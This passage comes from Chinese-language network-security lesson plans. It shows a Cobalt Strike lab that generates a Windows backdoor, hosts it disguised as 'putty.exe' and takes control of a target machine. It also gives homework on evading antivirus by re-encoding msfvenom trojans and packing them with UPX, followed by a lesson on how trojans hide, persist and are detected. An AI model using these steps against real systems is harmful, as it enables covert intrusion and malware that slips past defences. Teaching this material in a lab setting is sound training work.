ái)產(chǎn)安全帶來(lái)很大的危害。典型代表有TinyBanker、木馬銀行家等。CobaltStrike滲透工具CobaltStrike，這一在滲透測(cè)試領(lǐng)域內(nèi)的專(zhuān)業(yè)工具，憑借其卓越的功能與靈活性，已經(jīng)從原先依賴(lài)于MetasploitFramework的框架中獨(dú)立出來(lái)，發(fā)展為一個(gè)全面且獨(dú)立的操作平臺(tái)。它革命性地采用了C/S架構(gòu)設(shè)計(jì)，其中服務(wù)器端扮演著核心角色，充當(dāng)指揮中樞，負(fù)責(zé)管理和協(xié)調(diào)各種滲透任務(wù)，而客戶(hù)端則更加靈活多變，允許安全團(tuán)隊(duì)部署多個(gè)客戶(hù)端實(shí)例，以便團(tuán)隊(duì)成員能夠在不同地點(diǎn)進(jìn)行協(xié)同作業(yè)，實(shí)現(xiàn)真正的分布式滲透測(cè)試和紅隊(duì)演練。CobaltStrike有以下功能特性。（1）端口轉(zhuǎn)發(fā)與代理：允許攻擊者通過(guò)受控主機(jī)在內(nèi)網(wǎng)中進(jìn)行端口轉(zhuǎn)發(fā)，建立隧道穿透網(wǎng)絡(luò)隔離，便于后續(xù)的攻擊操作。（2）病毒與木馬生成：能夠生成多種類(lèi)型的惡意載荷，包括Windows可執(zhí)行文件、動(dòng)態(tài)鏈接庫(kù)、宏病毒文檔、JavaApplet等，用于釣魚(yú)攻擊或利用系統(tǒng)漏洞進(jìn)行植入。（3）漏洞利用：集成了一些已知漏洞的利用模塊，幫助攻擊者快速利用目標(biāo)系統(tǒng)的安全弱點(diǎn)。（4）憑據(jù)收集：能夠收集目標(biāo)網(wǎng)絡(luò)中的用戶(hù)名和密碼，利用明文憑據(jù)、哈希傳遞或憑證盜取技術(shù)進(jìn)一步滲透網(wǎng)絡(luò)。（5）橫向移動(dòng)：提供了多種技術(shù)，如哈希傳遞等，在內(nèi)網(wǎng)中橫向擴(kuò)散，控制更多的系統(tǒng)。任務(wù)二實(shí)施步驟（1）下載CobaltStrike安裝包，并將CobaltStrike安裝包上傳到Kali中。我們進(jìn)入CobaltStrike相應(yīng)的文件夾中，在終端輸入“./teamserver31admin”并執(zhí)行，運(yùn)行CobaltStrike服務(wù)器端軟件，如圖4-16所示。圖4-16運(yùn)行CobaltStrike服務(wù)器端軟件（2）下面需要運(yùn)行CobaltStrike客戶(hù)端軟件，CobaltStrike客戶(hù)端在Windows和Linux下都可以使用（注意運(yùn)行前安裝Java并配置相應(yīng)的環(huán)境變量）。此次在Kali中運(yùn)行客戶(hù)端，依然是在CobaltStrike相應(yīng)的文件夾中使用解壓后的文件夾，在終端輸入“./cobaltstrike”并執(zhí)行，啟動(dòng)客戶(hù)端，如圖4-17所示。圖4-17執(zhí)行命令啟動(dòng)客戶(hù)端（3）Strike服務(wù)器端的IP地址，本例中為“31”。在“密碼”文本框中填入剛剛在服務(wù)器端中設(shè)置的密碼，本例密碼為“admin”，如圖4-18所示。圖4-18設(shè)置CobaltStrike客戶(hù)端（4）設(shè)置完成后單擊“連接”按鈕就可以登錄CobaltStrike客戶(hù)端界面。顯示結(jié)果如圖4-19所示。圖4-19CobaltStrike客戶(hù)端界面（5）接下來(lái)需要?jiǎng)?chuàng)建監(jiān)聽(tīng)器用于監(jiān)聽(tīng)反饋。首先單擊“CobaltStrike”→“監(jiān)聽(tīng)器”，如圖4-20所示。圖4-20創(chuàng)建監(jiān)聽(tīng)器（6）通過(guò)上一步操作，我們打開(kāi)了“監(jiān)聽(tīng)器”選項(xiàng)卡，接下來(lái)單擊“添加”按鈕進(jìn)行下一步設(shè)置，如圖4-21所示。圖4-21在“監(jiān)聽(tīng)器”選項(xiàng)卡中添加配置（7）在彈出的“新建監(jiān)聽(tīng)器”窗口中進(jìn)行配置。在“名字”文本框中設(shè)置一個(gè)新名稱(chēng)，本例為“TEST”。在“Payload選項(xiàng)”的“HTTP地址”文本框使用“”鍵將服務(wù)器地址添加進(jìn)去，如圖4-22所示。完成后單擊“保存”按鈕進(jìn)行配置保存。圖4-22配置監(jiān)聽(tīng)器（8）配置并生成Windows遠(yuǎn)程木馬。在主界面單擊“攻擊”→“生成后門(mén)”→“Windows可執(zhí)行程序”，如圖4-23所示，完成后進(jìn)入配置界面。圖4-23進(jìn)入Windows可執(zhí)行程序配置界面（9）在打開(kāi)的Windows可執(zhí)行程序配置界面中的“監(jiān)聽(tīng)器”選擇框中選擇剛剛配置好的監(jiān)聽(tīng)器。本例中為“TEST”，如圖4-24所示。圖4-24配置木馬監(jiān)聽(tīng)器（10）選擇監(jiān)聽(tīng)器后，就可以單擊“生成”按鈕進(jìn)行Windows木馬生成，如圖4-25所示。圖4-25生成Windows木馬（11）生成木馬后，軟件會(huì)在界面中彈出木馬保存位置及名稱(chēng)的提醒，如圖4-26所示。圖4-26木馬保存位置及名稱(chēng)（12）圖4-27文件托管（13）在彈出的“文件托管”對(duì)話(huà)框中選擇剛剛生成的木馬的文件位置，將本地URI（UniformResourceIdentifier，統(tǒng)一資源標(biāo)識(shí)符）改為想要偽裝的程序名稱(chēng)，本例為“/putty.exe”，如圖4-28所示。完成后單擊“運(yùn)行”按鈕。圖4-28配置文件托管（14）操作完成后CobaltStrike會(huì)彈出配置好的URL以供復(fù)制使用，如圖4-29所示。圖4-29生成的URL（15）下面需要使用各種方式讓靶機(jī)單擊生成好的URL，下載偽裝好的木馬并讓靶機(jī)運(yùn)行，如圖4-30所示。圖4-30靶機(jī)下載并運(yùn)行偽裝好的木馬程序（16）等待片刻就可以在CobaltStrike中看到靶機(jī)上線(xiàn)的信息，如圖4-31所示。圖4-31看到靶機(jī)上線(xiàn)的信息（17）選擇被控靶機(jī)并右擊，如圖4-32所示，在彈出的快捷菜單中選擇“會(huì)話(huà)交互”。圖4-32選擇靶機(jī)的會(huì)話(huà)交互（18）使用shell命令進(jìn)行進(jìn)一步滲透活動(dòng)，例如，輸入“shellipconfig”命令并執(zhí)行，獲取靶機(jī)IP地址，如圖4-33所示。圖4-33執(zhí)行命令獲取靶機(jī)IP地址課后：1.任務(wù)鞏固2.教師答疑3.布置預(yù)習(xí)任務(wù)作業(yè)布置使用殺毒軟件查殺msfvenom生成的Windows木馬程序，觀(guān)察殺毒軟件能否查殺該木馬，如果該木馬被殺毒軟件查殺，我們可以嘗試使用msfvenom的-e選項(xiàng)選擇其他編碼方式生成新的木馬進(jìn)行免殺測(cè)試。同時(shí)，我們可以繼續(xù)嘗試將新生成的木馬程序通過(guò)添加花指令和UPX加殼后進(jìn)行進(jìn)一步測(cè)試。教學(xué)反思通過(guò)本節(jié)內(nèi)容講解，學(xué)生學(xué)習(xí)興趣很高，但實(shí)際案例分析和動(dòng)手實(shí)驗(yàn)部分需要進(jìn)一步加強(qiáng)，以提升理解的深度和實(shí)戰(zhàn)應(yīng)用能力?！毒W(wǎng)絡(luò)安全技術(shù)實(shí)踐教程》教案授課單位：授課時(shí)間：授課班級(jí)：授課教師：年月日教案9（第9號(hào)/17號(hào)）課程名稱(chēng)網(wǎng)絡(luò)安全授課日期、節(jié)次班級(jí)課堂類(lèi)型理論+實(shí)踐地點(diǎn)章節(jié)（任務(wù)）名稱(chēng)任務(wù)4.3木馬檢測(cè)教學(xué)目標(biāo)知識(shí)目標(biāo)1.了解木馬程序的常見(jiàn)隱藏方式（進(jìn)程、文件、注冊(cè)表等）。2.掌握木馬的典型啟動(dòng)方式及其對(duì)應(yīng)系統(tǒng)機(jī)制。3.識(shí)別主流木馬檢測(cè)技術(shù)的原理與應(yīng)用場(chǎng)景。能力目標(biāo)1.能夠使用火絨劍對(duì)可疑進(jìn)程和未知文件進(jìn)行監(jiān)控與分析。2.能夠使用D盾和Webshell本地掃描器查殺Webshell并識(shí)別風(fēng)險(xiǎn)文件。3.能夠根據(jù)行為特征判斷可疑程序是否為木馬。素質(zhì)目標(biāo)1.培養(yǎng)嚴(yán)謹(jǐn)細(xì)致的安全排查習(xí)慣。2.增強(qiáng)對(duì)系統(tǒng)安全威脅的敏感性與責(zé)任感。3.樹(shù)立主動(dòng)防御和持續(xù)監(jiān)控的信息安全意識(shí)。學(xué)情分析授課對(duì)象：計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)專(zhuān)業(yè)學(xué)生，包括中職與普高混合班。學(xué)生特點(diǎn)：計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)專(zhuān)業(yè)學(xué)生，基礎(chǔ)知識(shí)存在差異，需針對(duì)性講解與實(shí)踐操作結(jié)合。學(xué)習(xí)習(xí)慣：偏愛(ài)實(shí)踐性強(qiáng)的課程，理論學(xué)習(xí)興趣較低。樂(lè)于通過(guò)案例和互動(dòng)式教學(xué)理解知識(shí)點(diǎn)。重難點(diǎn)分析教學(xué)重點(diǎn)1.木馬的典型隱藏方式與啟動(dòng)機(jī)制理解。2.木馬檢測(cè)技術(shù)的原理與類(lèi)型區(qū)分。3.火絨劍、D盾、Webshell掃描器的實(shí)際使用方法。教學(xué)難點(diǎn)1.行為分析與虛擬機(jī)檢測(cè)等動(dòng)態(tài)檢測(cè)技術(shù)的理解。2.判斷未知程序是否為木馬的邏輯分析能力。3.工具操作中對(duì)可疑文件判斷的準(zhǔn)確性與處理策略。信息化應(yīng)用方法通過(guò)課件、視頻、案例分析、互動(dòng)提問(wèn)等多種信息化方式，借助學(xué)習(xí)通平臺(tái)發(fā)布學(xué)習(xí)資源和任務(wù)，學(xué)生自主學(xué)習(xí)并完成任務(wù)。課程思政元素1.網(wǎng)絡(luò)安全事關(guān)國(guó)家安全，培養(yǎng)學(xué)生的家國(guó)情懷與責(zé)任感。2.樹(shù)立服務(wù)意識(shí)，塑造職業(yè)精神，使學(xué)生形成運(yùn)用所學(xué)專(zhuān)業(yè)知識(shí)為社會(huì)貢獻(xiàn)的責(zé)任感。3.鍛煉學(xué)生實(shí)事求是的工作態(tài)度，培養(yǎng)學(xué)生嚴(yán)謹(jǐn)細(xì)致的工作作風(fēng)、精益求精的工匠精神。教學(xué)實(shí)施過(guò)程課前：平臺(tái)發(fā)布病毒與木馬的認(rèn)知與防護(hù)任務(wù)3學(xué)習(xí)任務(wù)，學(xué)生預(yù)習(xí)。課中：導(dǎo)入新課眾智科技深知木馬入侵可能對(duì)客戶(hù)信息系統(tǒng)帶來(lái)嚴(yán)重威脅。通過(guò)上次的系統(tǒng)入侵演示，客戶(hù)深度了解到木馬的危害。因此，客戶(hù)要求為其提供幾個(gè)簡(jiǎn)單的木馬檢測(cè)工具及操作方法，以便后續(xù)及時(shí)發(fā)現(xiàn)并規(guī)避潛在的安全風(fēng)險(xiǎn)。任務(wù)一知識(shí)點(diǎn)講解一.木馬的隱藏為了能在目標(biāo)系統(tǒng)中長(zhǎng)時(shí)間存在而不被發(fā)現(xiàn)或清除，木馬通過(guò)各種隱藏技術(shù)，如進(jìn)程隱藏、文件隱藏、注冊(cè)表隱藏等，躲避用戶(hù)的直接觀(guān)察和常規(guī)安全軟件的檢測(cè)。常見(jiàn)的木馬隱藏方式有以下幾種。1．進(jìn)程隱藏通過(guò)修改操作系統(tǒng)的核心組件，木馬可以隱藏其進(jìn)程、線(xiàn)程或文件，使得常規(guī)工具（如任務(wù)管理器等）無(wú)法檢測(cè)到它們。通過(guò)DLL（DynamicLinkedLibrary，動(dòng)態(tài)連接庫(kù)）注入，木馬將自身注入其他合法進(jìn)程之中，利用這些進(jìn)程作為宿主，從而掩蓋其存在。木馬進(jìn)程可使用與系統(tǒng)進(jìn)程相似的名稱(chēng)，以混淆視聽(tīng)，實(shí)現(xiàn)隱藏。2．文件隱藏通過(guò)隱寫(xiě)，可以將木馬代碼嵌入看似無(wú)害的文件中，如圖片、文檔或音頻文件。通過(guò)加密與壓縮木馬文件，可以使其看起來(lái)像普通數(shù)據(jù)文件。通過(guò)藏身于硬盤(pán)的空閑扇區(qū)，木馬可避免直接文件系統(tǒng)檢測(cè)。3．注冊(cè)表隱藏木馬可以通過(guò)修改注冊(cè)表啟動(dòng)項(xiàng)或?qū)⒆陨硖砑拥阶?cè)表系統(tǒng)服務(wù)中，利用系統(tǒng)自身的啟動(dòng)機(jī)制進(jìn)行隱藏。二、木馬的啟動(dòng)木馬為了能夠在目標(biāo)計(jì)算機(jī)上持久運(yùn)行并執(zhí)行其惡意任務(wù)，采用了多種啟動(dòng)方式來(lái)確保每次系統(tǒng)啟動(dòng)時(shí)其都能自動(dòng)加載。以下是木馬的幾種主要啟動(dòng)方式，這些方式涵蓋從傳統(tǒng)的Windows系統(tǒng)機(jī)制到更隱蔽的技術(shù)手段。1．注冊(cè)表啟動(dòng)木馬通過(guò)修改注冊(cè)表中的特定鍵值來(lái)實(shí)現(xiàn)自啟動(dòng)。主要涉及的鍵值包括：HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run這些鍵值決定了系統(tǒng)啟動(dòng)時(shí)自動(dòng)運(yùn)行的程序列表。2．文件夾啟動(dòng)在用戶(hù)的“啟動(dòng)”文件夾中放置快捷方式或可執(zhí)行文件，使得用戶(hù)每次登錄時(shí)木馬都能自啟動(dòng)。3．服務(wù)或驅(qū)動(dòng)啟動(dòng)木馬將自己注冊(cè)為系統(tǒng)服務(wù)或設(shè)備驅(qū)動(dòng)，這些服務(wù)或驅(qū)動(dòng)在系統(tǒng)啟動(dòng)時(shí)會(huì)自動(dòng)加載。由于服務(wù)或驅(qū)動(dòng)運(yùn)行在較高的權(quán)限級(jí)別下，使得木馬能夠擁有更多系統(tǒng)權(quán)限。4．任務(wù)計(jì)劃程序啟動(dòng)利用Windows的任務(wù)計(jì)劃程序創(chuàng)建任務(wù)，設(shè)置木馬在特定時(shí)間或系統(tǒng)事件觸發(fā)時(shí)自啟動(dòng)。5．DLL注入與掛鉤啟動(dòng)木馬通過(guò)將惡意DLL注入其他合法進(jìn)程中，或掛鉤系統(tǒng)API（ApplicationProgramInterface，應(yīng)用程序接口）調(diào)用，從而在這些程序啟動(dòng)時(shí)激活木馬功能。6．文件關(guān)聯(lián)劫持啟動(dòng)改變文件類(lèi)型關(guān)聯(lián)，這樣當(dāng)用戶(hù)嘗試打開(kāi)某一類(lèi)型的文件時(shí)，實(shí)際上激活的是木馬程序而非預(yù)期的應(yīng)用。例如，木馬可能會(huì)篡改系統(tǒng)中常用文件類(lèi)型的打開(kāi)方式，如將DOC、JPG或TXT等文件類(lèi)型與一個(gè)看似合法但實(shí)際上包含惡意代碼的程序關(guān)聯(lián)起來(lái)。這樣，當(dāng)用戶(hù)試圖打開(kāi)一個(gè)看似無(wú)害的文檔或圖片時(shí)，實(shí)際上激活的是木馬。三、主流的木馬檢測(cè)技術(shù)簡(jiǎn)介木馬作為一種隱蔽性強(qiáng)、危害性大的惡意軟件，持續(xù)對(duì)個(gè)人用戶(hù)、企業(yè)網(wǎng)絡(luò)乃至國(guó)家安全構(gòu)成嚴(yán)峻威脅。為了有效抵御這一威脅，安全專(zhuān)家與研究人員不斷探索與革新木馬檢測(cè)技術(shù)，力求在惡意軟件造成實(shí)際損害前將其識(shí)別并阻斷，主流的木馬檢測(cè)技術(shù)介紹如下。（1）特征碼檢測(cè)技術(shù)。特征碼檢測(cè)技術(shù)是反病毒反木馬領(lǐng)域較早使用的技術(shù)，也是目前公認(rèn)的最成熟、最有效的木馬檢測(cè)技術(shù)之一。即便現(xiàn)在動(dòng)態(tài)檢測(cè)技術(shù)發(fā)展如此迅速，也沒(méi)有撼動(dòng)特征碼檢測(cè)技術(shù)的地位。特征碼檢測(cè)技術(shù)準(zhǔn)確性高、誤報(bào)率低、檢測(cè)速度快的優(yōu)點(diǎn)是大多數(shù)檢測(cè)技術(shù)無(wú)法比擬的，因此一直被殺毒軟件廣泛使用并且沿用至今。特征碼檢測(cè)技術(shù)主要包括基于特征碼的靜態(tài)掃描、廣譜特征碼掃描和內(nèi)存特征碼比對(duì)技術(shù)3類(lèi)。（2）基于文件靜態(tài)特征的檢測(cè)技術(shù)。木馬程序的本質(zhì)是可執(zhí)行文件。通常Windows操作系統(tǒng)中的EXE文件和32位的DLL文件都采用的是PE格式。由于PE文件具有規(guī)范的結(jié)構(gòu)，因此可以利用數(shù)據(jù)挖掘等信息處理技術(shù)分析木馬文件與正常的可執(zhí)行文件的靜態(tài)特征。通過(guò)研究?jī)烧叩膮^(qū)別，找出木馬文件不同于正常的可執(zhí)行文件的特征，用于木馬的檢測(cè)。（3）文件完整性檢測(cè)技術(shù)。由于木馬感染計(jì)算機(jī)后通常會(huì)修改某些系統(tǒng)文件，因此可以通過(guò)檢查系統(tǒng)文件的完整性來(lái)判斷木馬是否存在。文件完整性檢測(cè)技術(shù)又稱(chēng)校驗(yàn)和檢測(cè)技術(shù)，其基本原理是在系統(tǒng)正常的情況下對(duì)所有的系統(tǒng)文件做校驗(yàn)，得到每個(gè)系統(tǒng)文件的校驗(yàn)和，并將其保存到數(shù)據(jù)庫(kù)中。在后續(xù)檢測(cè)時(shí)，首先計(jì)算當(dāng)前狀態(tài)下系統(tǒng)文件的校驗(yàn)和，然后將其與數(shù)據(jù)庫(kù)中保存的完整的校驗(yàn)和做比較，如果出現(xiàn)某個(gè)系統(tǒng)文件的兩個(gè)校驗(yàn)和不一致，則認(rèn)為此文件的完整性被破壞，即此文件被修改過(guò)，則當(dāng)前計(jì)算機(jī)有可能感染了木馬。（4）虛擬機(jī)檢測(cè)技術(shù)。虛擬